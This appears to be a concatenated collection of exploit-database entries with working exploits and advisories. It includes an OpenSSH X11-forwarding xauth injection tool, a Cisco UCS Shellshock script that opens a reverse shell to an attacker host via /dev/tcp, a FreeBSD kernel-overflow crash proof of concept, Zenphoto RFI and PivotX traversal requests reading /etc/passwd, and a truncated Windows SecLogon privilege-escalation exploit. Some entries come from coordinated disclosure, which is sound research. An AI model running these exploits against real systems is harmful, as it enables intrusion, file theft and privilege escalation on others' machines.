sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
user2:x:1001:1002:,,,:/home/user2:/bin/false
...
7. `/bin/false` - initiate outbound X connection to 8.8.8.8:6100
#> generate 8.8.8.8:100 .
#> tcpdump
IP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0
Mitigation / Workaround
------------------------
* disable x11-forwarding: `sshd_config` set `X11Forwarding no`
* disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys`
Notes
-----
Verified, resolved and released within a few days. very impressive.
Vendor response: see advisory [5]
References
----------
[1] http://www.openssh.com/
[2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388
[3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376
[4] http://linux.die.net/man/1/xauth
[5] http://www.openssh.com/txt/x11fwd.adv
'''
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Author : <github.com/tintinweb>
###############################################################################
#
# FOR DEMONSTRATION PURPOSES ONLY!
#
###############################################################################
import logging
import StringIO
import sys
import os
LOGGER = logging.getLogger(__name__)
try:
import paramiko
except ImportError, ie:
logging.exception(ie)
logging.warning("Please install python-paramiko: pip install paramiko / easy_install paramiko / <distro_pkgmgr> install python-paramiko")
sys.exit(1)
class SSHX11fwdExploit(object):
def __init__(self, hostname, username, password, port=22, timeout=0.5,
pkey=None, pkey_pass=None):
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if pkey:
pkey = paramiko.RSAKey.from_private_key(StringIO.StringIO(pkey),pkey_pass)
self.ssh.connect(hostname=hostname, port=port,
username=username, password=password,
timeout=timeout, banner_timeout=timeout,
look_for_keys=False, pkey=pkey)
def exploit(self, cmd="xxxx\n?\nsource /etc/passwd\n"):
transport = self.ssh.get_transport()
session = transport.open_session()
LOGGER.debug("auth_cookie: %s"%repr(cmd))
session.request_x11(auth_cookie=cmd)
LOGGER.debug("dummy exec returned: %s"%session.exec_command(""))
transport.accept(0.5)
session.recv_exit_status() # block until exit code is ready
stdout, stderr = [],[]
while session.recv_ready():
stdout.append(session.recv(4096))
while session.recv_stderr_ready():
stderr.append(session.recv_stderr(4096))
session.close()
return ''.join(stdout)+''.join(stderr) # catch stdout, stderr
def exploit_fwd_readfile(self, path):
data = self.exploit("xxxx\nsource %s\n"%path)
if "unable to open file" in data:
raise IOError(data)
ret = []
for line in data.split('\n'):
st = line.split('unknown command "',1)
if len(st)==2:
ret.append(st[1].strip(' "'))
return '\n'.join(ret)
def exploit_fwd_write_(self, path, data):
'''
adds display with protocolname containing userdata. badchars=<space>
'''
dummy_dispname = "127.0.0.250:65500"
ret = self.exploit('\nadd %s %s aa'%(dummy_dispname, data))
if ret.count('bad "add" command line')>1:
raise Exception("could not store data most likely due to bad chars (no spaces, quotes): %s"%repr(data))
LOGGER.debug(self.exploit('\nextract %s %s'%(path,dummy_dispname)))
return path
demo_authorized_keys = '''#PUBKEY line - force commands: only allow "whoami"
#cat /home/user/.ssh/authorized_keys
command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box
'''
PRIVKEY = """-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAtUaWCq7z5CM7wGH1/2XlNVMy7glVgYCVHjf8BUZo+FypdD69
9SPu06CZ3e0vSUx5KxlQ7vgU6CtH9nQli53oMy225a/RUGEon/axzVtwTpMnVLqn
PLEUn9zPaCjwwpg/Brhr5+NHc3bm/u/LHmKrEg6IjyWssE16exuhA3G/Teed+NaN
zKR3jVLrmXohc9dp57jYBPLZJ5NSojsd27LjdWnq/PokxwvkQOrOPkhTne+7GRts
U68nW5a99jMSb4bpgqsUsIY0IIsKc1nfzUxonvcXmh+RASIffLCzA0OdQyJ7UrPh
TLw8dVOK2e9zsJYlOYUA6G3rnzq9sNmqe7XdeQIDAQABAoIBAHu5M4sTIc8h5RRH
SBkKuMgOgwJISJ3c3uoDF/WZuudYhyeZ8xivb7/tK1d3HQEQOtsZqk2P8OUNNU6W
s1F5cxQLLXvS5i/QQGP9ghlBQYO/l+aShrY7vnHlyYGz/68xLkMt+CgKzaeXDc4O
aDnS6iOm27mn4xdpqiEAGIM7TXCjcPSQ4l8YPxaj84rHBcD4w033Sdzc7i73UUne
euQL7bBz5xNibOIFPY3h4q6fbw4bJtPBzAB8c7/qYhJ5P3czGxtqhSqQRogK8T6T
A7fGezF90krTGOAz5zJGV+F7+q0L9pIR+uOg+OBFBBmgM5sKRNl8pyrBq/957JaA
rhSB0QECgYEA1604IXr4CzAa7tKj+FqNdNJI6jEfp99EE8OIHUExTs57SaouSjhe
DDpBRSTX96+EpRnUSbJFnXZn1S9cZfT8i80kSoM1xvHgjwMNqhBTo+sYWVQrfBmj
bDVVbTozREaMQezgHl+Tn6G1OuDz5nEnu+7gm1Ud07BFLqi8Ssbhu2kCgYEA1yrc
KPIAIVPZfALngqT6fpX6P7zHWdOO/Uw+PoDCJtI2qljpXHXrcI4ZlOjBp1fcpBC9
2Q0TNUfra8m3LGbWfqM23gTaqLmVSZSmcM8OVuKuJ38wcMcNG+7DevGYuELXbOgY
nimhjY+3+SXFWIHAtkJKAwZbPO7p857nMcbBH5ECgYBnCdx9MlB6l9rmKkAoEKrw
Gt629A0ZmHLftlS7FUBHVCJWiTVgRBm6YcJ5FCcRsAsBDZv8MW1M0xq8IMpV83sM
F0+1QYZZq4kLCfxnOTGcaF7TnoC/40fOFJThgCKqBcJQZKiWGjde1lTM8lfTyk+f
W3p2+20qi1Yh+n8qgmWpsQKBgQCESNF6Su5Rjx+S4qY65/spgEOOlB1r2Gl8yTcr
bjXvcCYzrN4r/kN1u6d2qXMF0zrPk4tkumkoxMK0ThvTrJYK3YWKEinsucxSpJV/
nY0PVeYEWmoJrBcfKTf9ijN+dXnEdx1LgATW55kQEGy38W3tn+uo2GuXlrs3EGbL
b4qkQQKBgF2XUv9umKYiwwhBPneEhTplQgDcVpWdxkO4sZdzww+y4SHifxVRzNmX
Ao8bTPte9nDf+PhgPiWIktaBARZVM2C2yrKHETDqCfme5WQKzC8c9vSf91DSJ4aV
pryt5Ae9gUOCx+d7W2EU7RIn9p6YDopZSeDuU395nxisfyR1bjlv
-----END RSA PRIVATE KEY-----"""
if __name__=="__main__":
logging.basicConfig(loglevel=logging.DEBUG)
LOGGER.setLevel(logging.DEBUG)
if not len(sys.argv)>4:
print """ Usage: <host> <port> <username> <password or path_to_privkey>
path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key
"""
sys.exit(1)
hostname, port, username, password = sys.argv[1:]
port = int(port)
pkey = None
if os.path.isfile(password):
password = None
with open(password,'r') as f:
pkey = f.read()
elif password==".demoprivkey":
pkey = PRIVKEY
password = None
LOGGER.info("add this line to your authorized_keys file: \n%s"%demo_authorized_keys)
LOGGER.info("connecting to: %s:%s@%s:%s"%(username,password if not pkey else "<PKEY>", hostname, port))
ex = SSHX11fwdExploit(hostname, port=port,
username=username, password=password,
pkey=pkey,
timeout=10
)
LOGGER.info("connected!")
LOGGER.info ("""
Available commands:
.info
.readfile <path>
.writefile <path> <data>
.exit .quit
<any xauth command or type help>
""")
while True:
cmd = raw_input("#> ").strip()
if cmd.lower().startswith(".exit") or cmd.lower().startswith(".quit"):
break
elif cmd.lower().startswith(".info"):
LOGGER.info(ex.exploit("\ninfo"))
elif cmd.lower().startswith(".readfile"):
LOGGER.info(ex.exploit_fwd_readfile(cmd.split(" ",1)[1]))
elif cmd.lower().startswith(".writefile"):
parts = cmd.split(" ")
LOGGER.info(ex.exploit_fwd_write_(parts[1],' '.join(parts[2:])))
else:
LOGGER.info(ex.exploit('\n%s'%cmd))
# just playing around
#print ex.exploit_fwd_readfile("/etc/passwd")
#print ex.exploit("\ninfo")
#print ex.exploit("\ngenerate <ip>:600<port> .") # generate <ip>:port port=port+6000
#print ex.exploit("\nlist")
#print ex.exploit("\nnlist")
#print ex.exploit('\nadd xx xx "\n')
#print ex.exploit('\ngenerate :0 . data "')
#print ex.exploit('\n?\n')
#print ex.exploit_fwd_readfile("/etc/passwd")
#print ex.exploit_fwd_write_("/tmp/somefile", data="`whoami`")
LOGGER.info("--quit--")
#!/usr/bin/python
###############################################
# Cisco UCS Manager 2.1(1b) Shellshock Exploit
#
# CVE-2014-6278
# Confirmed on version 2.1(1b), but more are likely vulnerable.
# Cisco's advisory:
# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
# Exploit generates a reverse shell to a nc listener.
# Exploit Author: @thatchriseckert
###############################################
import sys
import requests
import time
if len(sys.argv) < 4:
print "\n[*] Cisco UCS Manager 2.1(1b) Shellshock Exploit"
print "[*] Usage: <Victim IP> <Attacking Host> <Reverse Shell Port>"
print "[*]"
print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 4444"
print "[*] Listener: nc -lvp <port>"
print "\n"
sys.exit()
#Disables request warning for cert validation ignore.
requests.packages.urllib3.disable_warnings()
ucs = sys.argv[1]
url = "https://" + ucs + "/ucsm/isSamInstalled.cgi"
attackhost = sys.argv[2]
revshellport = sys.argv[3]
headers1 = {
'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1'
}
headers2 = {
"User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo $(</etc/passwd)'
}
def exploit():
try:
r = requests.get(url, headers=headers1, verify=False, timeout=5)
except Exception, e:
if 'timeout' in str(e):
print "[+] Success. Enjoy your shell..."
else:
print "[-] Something is wrong..."
print "[-] Error: " + str(e)
def main():
try:
r = requests.get(url, headers=headers2, verify=False, timeout=3)
if r.content.startswith('\nroot:'):
print "[+] Host is vulnerable, spawning shell..."
time.sleep(3)
exploit()
else:
print "[-] Host is not vulnerable, quitting..."
sys.exit()
except Exception, e:
print "[-] Something is wrong..."
print "[-] Error: " + str(e)
if __name__ == "__main__":
main()
/*
1. Advisory Information
Title: FreeBSD Kernel amd64_set_ldt Heap Overflow
Advisory ID: CORE-2016-0005
Advisory URL: http://www.coresecurity.com/content/freebsd-kernel-amd64_set_ldt-heap-overflow
Date published: 2016-03-16
Date of last update: 2016-03-14
Vendors contacted: FreeBSD
Release mode: Coordinated release
2. Vulnerability Information
Class: Unsigned to Signed Conversion Error [CWE-196]
Impact: Denial of service
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2016-1885
3. Vulnerability Description
FreeBSD is an advanced computer operating system used to power modern servers, desktops and embedded platforms. A large community has continually developed it for more than thirty years. Its advanced networking, security and storage features have made FreeBSD the platform of choice for many of the busiest web sites and most pervasive embedded networking and storage devices.
An integer signedness error has been found in the amd64_set_ldt() function in the FreeBSD kernel code (defined in the /sys/amd64/amd64/sys_machdep.c file), which implements the i386_set_ldt system call on the amd64 version of the OS. This integer signedness issue ultimately leads to a heap overflow in the kernel, allowing local unprivileged attackers to crash the system.
4. Vulnerable packages
FreeBSD 10.2 amd64.
Other amd64 versions may be affected too but they were no checked.
5. Non-vulnerable packages
FreeBSD 10.2-RELENG.
6. Vendor Information, Solutions and Workarounds
The FreeBSD team has released patches for the reported vulnerabilities. You should upgrade to FreeBSD 10.2-RELENG.
7. Credits
This vulnerability was discovered and researched by Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.
8. Technical Description / Proof of Concept Code
8.1. FreeBSD amd64_set_ldt Integer Signedness Vulnerability
[CVE-2016-1885] FreeBSD exposes the i386_set_ldt[1] architecture-dependent system call for its Intel i386 version. This system call can be used to manage i386 per-process Local Descriptor Table (LDT) entries. The amd64 version of FreeBSD still exposes this system call for 32-bit applications running on the 64-bit version of the OS.
Architecture-specific system calls are handled by the FreeBSD kernel in the sysarch() function, which is defined in the /sys/amd64/amd64/sys_machdep.c[2] file:
int
sysarch(td, uap)
struct thread *td;
register struct sysarch_args *uap;
{
[...]
if (uap->op == I386_GET_LDT || uap->op == I386_SET_LDT)
return (sysarch_ldt(td, uap, UIO_USERSPACE));
[...]
As we can see in the code snippet above, if the system call being invoked is either I386_GET_LDT or I386_SET_LDT, then the sysarch_ldt() function is called. The following code excerpt shows the part of the sysarch_ldt() function that is in charge of handling the I386_SET_LDT syscall:
int
sysarch_ldt(struct thread *td, struct sysarch_args *uap, int uap_space)
{
struct i386_ldt_args *largs, la;
struct user_segment_descriptor *lp;
[...]
switch (uap->op) {
[...]
case I386_SET_LDT:
if (largs->descs != NULL && largs->num > max_ldt_segment)
return (EINVAL);
set_pcb_flags(td->td_pcb, PCB_FULL_IRET);
if (largs->descs != NULL) {
lp = malloc(largs->num * sizeof(struct
user_segment_descriptor), M_TEMP, M_WAITOK);
error = copyin(largs->descs, lp, largs->num *
sizeof(struct user_segment_descriptor));
if (error == 0)
error = amd64_set_ldt(td, largs, lp);
free(lp, M_TEMP);
} else {
error = amd64_set_ldt(td, largs, NULL);
}
break;
The largs variable that can be seen there is a pointer to an i386_ldt_args structure, which is defined as follows in the /sys/x86/include/sysarch.h[3] file:
struct i386_ldt_args {
unsigned int start;
union descriptor *descs;
unsigned int num;
};
Note that all of the fields of the i386_ldt_args structure are fully user-controlled: they match the 3 arguments specified by the user when i386_set_ldt() was called from user mode:
int i386_set_ldt(int start_sel, union descriptor *descs, int num_sels);
From the sysarch_ldt() snippet above we can see that if we call i386_set_ldt() from user mode specifying a NULL pointer as the second argument (largs->descs), then it will end up calling the amd64_set_ldt() function, passing the largs variable as the second argument, and a NULL pointer as the third argument. This is the prototype of the amd64_set_ldt() function being called:
int
amd64_set_ldt(struct thread *td, struct i386_ldt_args *uap, struct user_segment_descriptor *descs);
amd64_set_ldt() is the vulnerable function here. Since it is being called with its third argument (the descs pointer) set to NULL, the following code path will be executed (remember that every field in the i386_ldt_args structure pointed by the uap pointer is fully controlled from user mode):
int
amd64_set_ldt(td, uap, descs)
struct thread *td;
struct i386_ldt_args *uap;
struct user_segment_descriptor *descs;
{
[...]
int largest_ld;
[...]
608 if (descs == NULL) {
609 Free descriptors
610 if (uap->start == 0 && uap->num == 0)
611 uap->num = max_ldt_segment;
612 if (uap->num == 0)
613 return (EINVAL);
614 if ((pldt = mdp->md_ldt) == NULL ||
615 uap->start >= max_ldt_segment)
616 return (0);
617 largest_ld = uap->start + uap->num;
618 if (largest_ld > max_ldt_segment)
619 largest_ld = max_ldt_segment;
620 i = largest_ld - uap->start;
621 mtx_lock(&dt_lock);
622 bzero(&((struct user_segment_descriptor *)(pldt->ldt_base))
623 [uap->start], sizeof(struct user_segment_descriptor) * i);
624 mtx_unlock(&dt_lock);
625 return (0);
626 }
The two if statements at lines 610 and 612 perform some sanity checks against uap->start and uap->num, which can be avoided by setting uap->num to a value different than 0. The next check at lines 614/615 will cause the function to exit early if the mdp->md_ldt pointer is NULL, or if uap->start is greater or equal than max_ldt_segment (1024). Having mdp->md_ldt holding a non-NULL value can be achieved by adding an initial entry to the process LDT before triggering the bug, like this:
struct segment_descriptor desc = {0, 0, SDT_MEMRW, SEL_UPL, 1, 0, 0, 1, 0 ,0};
i386_set_ldt(LDT_AUTO_ALLOC, (union descriptor *) &desc, 1);
After passing those checks we reach the vulnerable code at lines 617-619:
617 largest_ld = uap->start + uap->num;
618 if (largest_ld > max_ldt_segment)
619 largest_ld = max_ldt_segment;
620 i = largest_ld - uap->start;
Note that largest_ld is a signed int that will hold the sum of uap->start + uap->num. The code at lines 618-619 tries to ensure that largest_ld is not greater than max_ldt_segment (1024); however, being largest_ld a signed integer holding a value fully controlled from user mode, it will perform a signed comparison that can be bypassed by setting uap->num to a negative number.
This signedness error will ultimately lead to a heap overflow in the FreeBSD kernel when the bzero() function is later called with a huge value as its len parameter:
622 bzero(&((struct user_segment_descriptor *)(pldt->ldt_base))
623 [uap->start], sizeof(struct user_segment_descriptor) * i);
8.2. Proof of Concept
The following Proof-of-Concept code reproduces the vulnerability in a default FreeBSD 10.2-RELEASE-amd64 installation running a GENERIC kernel:
*/
/* $ clang amd64_set_ldt.c -o amd64_set_ldt -m32 */
#include <stdio.h>
#include <unistd.h>
#include <machine/segments.h>
#include <machine/sysarch.h>
#include <sysexits.h>
#include <err.h>
int main(int argc, char **argv){
int res;
struct segment_descriptor desc = {0, 0, SDT_MEMRW, SEL_UPL, 1, 0, 0, 1, 0 ,0};
printf("[+] Adding an initial entry to the process LDT...\n");
res = i386_set_ldt(LDT_AUTO_ALLOC, (union descriptor *) &desc, 1);
if (res < 0){
err(EX_OSERR, "i386_set_ldt(LDT_AUTO_ALLOC)");
}
printf("returned index: %d\n", res);
printf("Triggering the bug...\n");
res = i386_set_ldt(1, NULL, 0x80000000);
}
/*
9. Report Timeline
2016-03-02: Core Security sent an initial notification to FreeBSD.
2016-03-02: FreeBSD confirmed reception of our email and requested we sent them a draft version of the advisory.
2016-03-02: Core Security sent FreeBSD a draft version of the advisory. We requested them to let us know once they finished reviewing the advisory in order to coordinate a publication date.
2016-03-11: Core Security asked FreeBSD if they were able to review and verify the reported issue. We additionally requested an estimated date for releasing the fix/update.
2016-03-11: FreeBSD informed us they were going to release the update in the middle of the following week.
2016-03-11: Core Security asked FreeBSD if they had the specific date and time they were going to release the update. We additionally requested a CVE identifier for the vulnerability considering they are registered as a CNA.
2016-03-11: FreeBSD informed us they would probably release it on Wednesday 16th of March and that they assigned the CVE-2016-1885 ID.
2016-03-16: Advisory CORE-2016-0005 published.
10. References
[1] https://www.freebsd.org/cgi/man.cgi?query=i386_set_ldt&sektion=2&manpath=FreeBSD+8.2-RELEASE
[2] https://svnweb.freebsd.org/base/release/10.2.0/sys/amd64/amd64/sys_machdep.c?view=markup
[3] https://svnweb.freebsd.org/base/release/10.2.0/sys/x86/include/sysarch.h?view=markup
11. About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
12. About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
13. Disclaimer
The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
*/
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Zenphoto 1.4.11
Fixed in: 1.4.12
Fixed Version Link: https://github.com/zenphoto/zenphoto/archive/
zenphoto-1.4.12.zip
Vendor Website: http://www.zenphoto.org/
Vulnerability Type: RFI
Remote Exploitable: Yes
Reported to vendor: 01/29/2016
Disclosed to 03/15/2016
public:
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Zenphoto is a CMS for hosting images, written in PHP. In version 1.4.11, it is
vulnerable to remote file inclusion. An admin account is required.
3. Details
Description
CVSS: High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C
When downloading a log file, the input is not properly sanitized, leading to
RFI.
An admin account is required, and allow_url_fopen must be set to true - which
is the default setting.
In old versions of PHP, this would additionally lead to LFI via null byte
poisoning or path expansion, regardless of allow_url_fopen settings.
Proof of Concept
GET /zenphoto-zenphoto-1.4.11/zp-core/admin-logs.php?action=download_log&page=
logs&tab=http://localhost/shell.php%3f%78%3d%69%64%26%66%6f%6f%3d&filename=
security&XSRFToken=afd5bafed21279d837486fd2beea81f87bc29dea HTTP/1.1
Code
// admin-logs.php (sanitize(x, 3) only strips out tags)
case 'download_log':
$zipname = sanitize($_GET['tab'], 3) . '.zip';
if (class_exists('ZipArchive')) {
$zip = new ZipArchive;
$zip->open($zipname, ZipArchive::CREATE);
$zip->addFile($file, basename($file));
$zip->close();
ob_get_clean();
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private", false);
header("Content-Type: application/zip");
header("Content-Disposition: attachment; filename=" . basename($zipname) . ";" );
header("Content-Transfer-Encoding: binary");
header("Content-Length: " . filesize($zipname));
readfile($zipname);
// remove zip file from temp path
unlink($zipname);
exit;
} else {
include_once(SERVERPATH . '/' . ZENFOLDER . '/lib-zipStream.php');
$zip = new ZipStream($zipname);
$zip->add_file_from_path(internalToFilesystem(basename($file)),internalToFilesystem($file));
$zip->finish();
}
break;
4. Solution
To mitigate this issue please upgrade at least to version 1.4.12:
https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip
Please note that a newer version might already be available.
5. Report Timeline
01/29/2016 Informed Vendor about Issue
01/29/2016 Vendor replies
02/23/2016 Vendor sends fix for verification
02/23/2016 Suggested improvements for attempted fix
02/29/2016 Delayed Disclosure
03/14/2016 Vendor releases fix
03/15/2016 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/Zenphoto-1411-RFI-156.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: PivotX 2.3.11
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://pivotx.net/
Vulnerability Type: Directory Traversal
Remote Exploitable: Yes
Reported to vendor: 01/20/2016
Disclosed to public: 03/15/2016
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is
vulnerable to Directory Traversal, allowing authenticated users to read and
delete files outside of the PivotX directory.
3. Details
Description
CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N
The function cleanPath which is responsible for sanitizing path names can be
bypassed by an attacker, leading to directory traversal in multiple places.
Proof of Concept
Admins and Superadmins can read any file:
http://localhost/pivotx_latest/pivotx/ajaxhelper.php?function=view&basedir=
L3Zhci93d3cvcGl2b3R4X2xhdGVzdC9CYXNlZGlyLwo=&file=../.....//...//.....//.../
/.....//...//.....//...//.....//...//.....//...//etc/passwd
Advanced users, Admins and Superadmins can delete any file, possibly leading to
DOS:
http://localhost/pivotx_latest/pivotx/index.php?page=media&del=.....//.../
/.....//...//.....//...//.....//...//.....//...//.....//...//important/
important.file&pivotxsession=ovyyn4ob2jc5ym92
Code
lib.php
function cleanPath($path) {
$path = str_replace('../', '', $path);
$path = str_replace('..\\', '', $path);
$path = str_replace('..'.DIRECTORY_SEPARATOR, '', $path);
return $path;
}
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
01/20/2016 Informed Vendor about Issue
01/29/2016 Vendor replies, PivotX is not maintained anymore
03/15/2016 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/PivotX-2311-Directory-Traversal-154.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
Exploit Title: Wildfly: WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass
Date: 09.02.16
Exploit Author: Tal Solomon of Palantir Security
Vendor Homepage: https://bugzilla.redhat.com/show_bug.cgi?id=1305937
Software Link: http://wildfly.org/downloads/
Version: This issue effects versions of Wildfly prior to 10.0.0.Final, including 9.0.2.Final, and 8.2.1.Final.
Tested on: Windows
CVE : CVE-2016-0793
An information disclosure of the content of restricted files WEB-INF and META-INF via filter mechanism was reported. Servlet filter restriction mechanism is enforced by two code checks:
if (path.startsWith("/META-INF") || path.startsWith("META-INF") || path.startsWith("/WEB-INF") || path.startsWith("WEB-INF")) {
return false;
}
private boolean isForbiddenPath(String path) {
return path.equalsIgnoreCase("/meta-inf/") || path.regionMatches(true, 0, "/web-inf/", 0, "/web-inf/".length());
}
which can be bypassed using lower case and adding meaningless character to path.
Proof of Concept Video:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39573.zip
/*
Sources:
https://bugs.chromium.org/p/project-zero/issues/detail?id=687
https://googleprojectzero.blogspot.ca/2016/03/exploiting-leaked-thread-handle.html
Windows: Secondary Logon Standard Handles Missing Sanitization EoP
Platform: Windows 8.1, Windows 10, not testing on Windows 7
Class: Elevation of Privilege
Summary:
The SecLogon service does not sanitize standard handles when creating a new process leading to duplicating a system service thread pool handle into a user accessible process. This can be used to elevate privileges to Local System.
Description:
The APIs CreateProcessWithToken and CreateProcessWithLogon are exposed to user applications, however they’re actually implemented in a system service, Secondary Logon. When these methods are called it’s actually dispatched over RPC to the service.
Both these methods take the normal STARTUPINFO structure and supports the passing of standard handles when the STARTF_USESTDHANDLES is used. Rather than the “standard” way of inheriting these handles to the new process the service copies them manually using the SlpSetStdHandles function. This does something equivalent to:
BOOL SlpSetStdHandles(HANDLE hSrcProcess, HANDLE hTargetProcess, HANDLE handles[]) {
foreach(HANDLE h : handles) {
DuplicateHandle(hSrcProcesss, h, hTargetProcess, &hNewHandle, 0, FALSE, DUPLICATE_SAME_ACCESS);
}
}
The vulnerability is nothing sanitizes these values. NtDuplicateObject special cases a couple of values for the source handle, Current Process (-1) and Current Thread (-2). NtDuplicateObject switches the thread’s current process to the target process when duplicating the handle, this means that while duplicating -1 will return a handle to the new process -2 will return a handle to the current thread which is actually a thread inside the svchost process hosting seclogon. When passing DUPLICATE_SAME_ACCESS for the current thread handle it's automatically given THREAD_ALL_ACCESS rights. The handle now exists in the new process and can be used by low privileged code.
This can be exploited in a number of ways. The new process can set the thread’s context causing the thread to dispatch to an arbitrary RIP. Or as these are thread pool threads servicing RPC requests for services such as BITS, Task Scheduler or seclogon itself you could do things like force a system level impersonation token (repeatedly) which overrides the security enforcement of these services leading to arbitrary file writes or process creation at Local System. It would be easy enough to run the exploit multiple times to capture handles to all thread pool threads available for RPC in the hosting process and then just keep trying until it succeeds.
One final point on exploitability. A normal user cannot use CreateProcessWithToken as the service checks that an arbitrary process can be opened by the user and has SeImpersonatePrivilege in its primary token. CreateProcessWithLogon will work but it seems you’d need to know a user’s password which makes it less useful for a malicious attacker. However you can specify the LOGON_NETCREDENTIALS_ONLY flag which changes the behaviour of LogonUser, instead of needing valid credentials the password is used to change the network password of a copy of the caller’s token. The password can be anything you like, it doesn’t matter.
Proof of Concept:
I’ve provided a PoC as a C# source code file. You need to compile it with Any CPU support (do not set 32 bit preferred). The PoC must match the OS bitness.
1) Compile the C# source code file.
2) Execute the poc executable as a normal user. This will not work from low IL.
3) The PoC should display a message box on error or success.
Expected Result:
The call to CreateProcessWithLogon should fail and the PoC will display the error.
Observed Result:
The process shows that it’s captured a handle from a service process. If you check process explorer or similar you’ll see the thread handle has full access rights.
*/
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <map>
#define MAX_PROCESSES 1000
HANDLE GetThreadHandle()
{
PROCESS_INFORMATION procInfo = {};
STARTUPINFO startInfo = {};
startInfo.cb = sizeof(startInfo);
startInfo.hStdInput = GetCurrentThread();
startInfo.hStdOutput = GetCurrentThread();
startInfo.hStdError = GetCurrentThread();
startInfo.dwFlags = STARTF_USESTDHANDLES;
if (CreateProcessWithLogonW(L"test", L"test", L"test",
LOGON_NETCREDENTIALS_ONLY,
nullptr, L"cmd.exe", CREATE_SUSPENDED,
nullptr, nullptr, &startInfo, &procInfo))
{
HANDLE hThread;
BOOL res = DuplicateHandle(procInfo.hProcess, (HANDLE)0x4,
GetCurrentProcess(), &hThread, 0, FALSE, DUPLICATE_SAME_ACCESS);
DWORD dwLastError = GetLastError();
TerminateProcess(procInfo.hProcess, 1);
CloseHandle(procInfo.hProcess);
CloseHandle(procInfo.hThread);
if (!res)
{
printf("Error duplicating handle %d\n", dwLastError);
exit(1);
}
return hThread;
}
else
{
printf("Error: %d\n", GetLastError());
exit(1);
}
}
typedef NTSTATUS __stdcall NtImpersonateThread(HANDLE ThreadHandle,
HANDLE ThreadToImpersonate,
PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService);
HANDLE GetSystemToken(HANDLE hThread)
{
SuspendThread(hThread);
NtImpersonateThread* fNtImpersonateThread =
(NtImpersonateThread*)GetProcAddress(GetModuleHandle(L"ntdll"),
"NtImpersonateThread");
SECURITY_QUALITY_OF_SERVICE sqos = {};
sqos.Length = sizeof(sqos);
sqos.ImpersonationLevel = SecurityImpersonation;
SetThreadToken(&hThread, nullptr);
NTSTATUS status = fNtImpersonateThread(hThread, hThread, &sqos);
if (status != 0)
{
ResumeThread(hThread);
